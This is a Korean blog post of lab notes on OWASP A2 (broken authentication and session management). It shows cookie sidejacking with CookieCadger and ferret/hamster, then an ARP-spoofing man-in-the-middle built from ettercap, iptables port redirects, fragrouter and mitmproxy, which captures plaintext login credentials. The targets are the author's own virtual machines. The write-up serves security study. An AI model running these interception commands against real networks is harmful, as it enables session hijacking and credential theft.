본문 바로가기

NCS/기술적보안구축

OWASP-A2 인증및세션관리취약점

사용환경

: 백트랙 5R3 - Vmware에서 구현 / NIC: Bridged

: Windows 7 Professional SP1 - VMWare 구현하고 있는 호스트 PC

 

1. 먼저 백트랙에서 Mozilla 열고 다음 사이트로 이동하여 하단에 있는 CookieCadger-1.06.jar 파일을 다운로드 받아 root 사용자의 홈디렉터리에 받자.

 

 

2. 다운 로드 후라면 Mozilla 닫는다.

 

3. 터미널 열고 다음 아래와 같이 입력하자.


 

4. 3 터미널을 유지한 다른 터미널 열고 아래와 같이 입력한다.


 

5. 다음 화면에서 yes 클릭


 

6. eth0 랜카드를 선택하고 Start Capture on Eth0 버튼을 클릭한다.


 

 

7. Windows 7 시스템에서 익스플로러를 열고 사이트에 접속하여 보자.

저자의 ID 로그인 쪽지를 보고 있는 창이다.


 

8. 백트랙으로 돌아가 CookieCadger창에서  윈도우 시스템의 MAC 주소를 클릭하자 윈도우 시스템에서 접속한 URL등이 보인다.


 

9. 도메인 note.naver.com 클릭한


 

10. Load Domain Cookies 클릭 했더니


 

11. 저자의 스팸 메일함 까지도 그냥 들어 갈수 있다.





====================================================================


Package 설치

1. 패키지를 설치하기전에 repository를 확인하자

# cat /etc/apt/sources.list


deb http://http.kali.org/kali kali-rolling main non-free contrib

(이 내용이 없다면 추가하라)


2. 우리가 설치하고자하는 패키지는 i386이다. 하지만 사용하는 시스템 플랫폼이 x64일 경우에는 패키지 설치가 실패하므로 아래와 같이 멀티 architecture를 운영 할 수 있도록 추가한다.

#dpkg --print-architecture (현재 플랫폼 확인하기)


# dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386



새로운 터미널에서 헴스터를 실행하여 프락시서버의 위치값을 찾는다

#hamster

(http://127.0.0.1:1234)


새로운 터미널에서

#ferret -i eth0


새로운 터미널에서

firefox http://127.0.0.1:1234 &


Adapters 클릭

eth0 입력 후 Submit Query  클릭


윈도우 7 에서 웹에 접속하자.




파이어폭스에서 새로고침 해보자(5분정도 충분히 기다린 후 하자)

(아래그림에서는 192.168.8.131이 윈도우 7이다)


윈도우7에서 본 화면을 볼 수 있다.





===================================================================

칼리 리눅스에서


새로운 터미널에서

# ettercap -T -M arp ///  ///


새로운 터미널에서

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

# fragrouter -B1


새로운 터미널에서

# mitmproxy -i eth0 -T --host



윈도우 클라이언트에서 웹 서핑을 한다.



기존 터미널에서( mitmproxy -i eth0 -T --host ) 보면 아래와 같이 보인다.




윈도우 클라이언트에서 테스트 웹서버에 로그인한 후 세션을 확인해보자






POST http://192.168.8.136/member/member_login_check.asp을 클릭했다.

user_id / user_pw가 확연히 보인다.




 참조사이트 


아래 유튜브를 확인해 볼것

https://www.youtube.com/watch?v=TUejP4zyUD4


http://docs.mitmproxy.org/en/stable/mitmproxy.html#